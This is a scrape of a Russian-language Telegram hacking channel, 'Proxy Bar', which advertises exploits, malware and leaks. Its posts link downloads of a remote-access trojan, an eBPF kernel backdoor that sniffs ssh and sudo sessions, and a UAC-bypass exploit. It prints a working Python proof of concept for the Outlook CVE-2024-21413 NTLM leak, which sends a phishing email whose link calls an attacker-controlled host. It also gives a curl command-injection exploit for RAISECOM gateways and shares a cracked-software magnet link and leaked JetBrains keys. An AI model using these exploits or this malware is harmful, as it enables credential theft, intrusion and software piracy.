Proxy Bar – Telegram
Proxy Bar
19.6K subscribers
1.29K photos
76 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Linux Shellcoding
*
Избегайте нулевых байтов \\x00 в шеллкодесах !!!
*
Щелкнуть орешек знаний тут

#linux #redteam
👍10🔥3
Плащ невидимка для linux процессов
*
В программе:
Аномальное монтирование
Пустые каталоги в которых есть жизнь
Заплывы с sTrace
Форензика одной ладошкой
*
Я надеваю свой плащ и волшебную шляпу - Invisibility Cloak - Slash-Proc Magic

#redteam #linux #proc
🔥13👍6
Media is too big
VIEW IN TELEGRAM
Поздравляем с днем системного администратора 2024
*
и смотрим классику 😏

#sysadminDAY
🔥59👍9
eBPF based kernel backdoor
*
Снифинг ssh/sudo/su/login/passwd сессий
*
download

#ebpf #linux
👍9🔥5
Xeno Rat
*
Опенсорсный РАТник, написан на C# и совместим с Windows 10, 11
*
Крыса умеет:
HVNC
Live Microphoneand camera
Socks5 Reverse Proxy
Regular Updates and Much More (ну тут сомнительно)
Built Completely from Scratch (скорее минус чем плюс)
UAC bypass (хммм)
Fun menu (праздник для души и мёд для ушей)
ну и куча всего

download крысу

#RAT #funny
🔥14👍8😱1
BreachForum Party !!!

В программе:
Канье Уэст и агенты FBI
BugBounty с паяльником
Ряженные cisco talos
И мерч в полоску
Вы приходите
😆

#breachforum
👍15🔥5😱1
👍9🔥6
Certified Ethical Hacker (CEH) v11
*
38 GB
*
download
🔥38👍7
Пишем stealer logs parser
*
WriteUp
*
SourceCode (template)
🔥16👍8
2024-21413 /outlook RCE
*
POC

import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

def send_email():
# Get user input for sender's email address and password
sender_email = input("Enter your Outlook email address: ")
sender_password = input("Enter your Outlook email password: ")

# Get user input for receiver's email address
receiver_email = input("Enter the recipient's email address: ")

# Create a new message object
msg = MIMEMultipart()

# Add sender, receiver, and subject to the message
msg['From'] = sender_email
msg['To'] = receiver_email
msg['Subject'] = input("Enter email subject: ")

# Ask user if they want to add a link attachment
add_attachment = input("Do you want to add a link attachment? (yes/no): ").lower()
if add_attachment == 'yes':
html_content = """\
<!DOCTYPE html>
<html lang="en">
<body>
<p><a href="file:///\\192.168.206.139/test/Doc.txt!xssvideo">Salary docs</a></p>
</body>
</html>"""
msg.attach(MIMEText(html_content, 'html'))

# Connect to SMTP server and send email
with smtplib.SMTP('smtp-mail.outlook.com', 587) as server:
server.starttls()
server.login(sender_email, sender_password)
server.send_message(msg)
print("Email sent successfully.")

if __name__ == "__main__":
send_email()


Но есть пара НО:
1. В строке 27 вам необходимо указать путь к файлу на вашем сервере (линк на rtf например)
2. На линк жертве кликать не нужно, Office Protected View все сам сделает.
3. Было мнение что нужно находиться в LAN жертвы, но как бы есть пара минут пока port established

#outглюк #ntlm2
🔥18👍10
Binary Ninja 4.1 Final + crack
*
(Linux+windows+Mac версии)
*
magnet link
magnet:?xt=urn:btih:c392c1aab1786180413167e3b8345f0f9d1fc8c4&dn=binja_release_6
👍21
👍30🔥10😱6
.NET PROFILER DLL LOADING
*
Эксплойт загружает вредоносную DLL с помощью планировщика задач (MMC) для обхода UAC и получения прав администратора.
👍13🔥1
👍25🔥11😱3
TuDoor
*
Только не королевская династия, я скорее династия DNS.
В общем к сути, собралась как то в Окледе (богоспасаемые штаты) группа хитрых азиатов.
Слово за слово, все скатилось к перечитыванию RFC и трудов Дэна Камински (мир праху его),
основной тезис которого как известно гласит, пойди и отрави DNS ближнего своего.
Ну и как водится дочитались до дыр в BIND, PowerDNS и Microsoft DNS и всего сопутствующего.
*
Рекомендую к осмыслению саму страничку и линки внизу.
Среда чюваки

#DNS #DOS #cachepoison
👍17🔥3😱3
Прекрасное 🤣

#nightHumor
👍14🔥7😱5
CVE-2024-7120 RAISECOM Gateway Devices
*
WriteUp
*
Exploit command injection
curl 'http://<TARGET_IP>/vpn/list_base_config.php?type=mod&parts=base_config&template=`<INJECTED_SHELL_COMMAND>`' \
-H 'Accept: */*' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'Connection: keep-alive'
👍5🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
WhatsApp extension manipulation
*
Что с телегой, что вацапом, это даже комментировать не хочется, когда юзер сам ставит APK и дает ему разрешения.
Когда там последний zeroClick был, 2 года назад ? )
*
POC

#FU
👍24🔥8😱5
CVE-2024-36401 GeoServer
*
POC мы уже публиковали, но тут прям fullH0use
*
Полный exploit + модуль для Mass Scanning
*
Download exploit
🔥16👍1
JetBrains Keys
*
Ключи истекают 14 сентября 2026 г.
*
ВСЕ ПРОДУКТЫ !!!
*
Link
🔥45👍5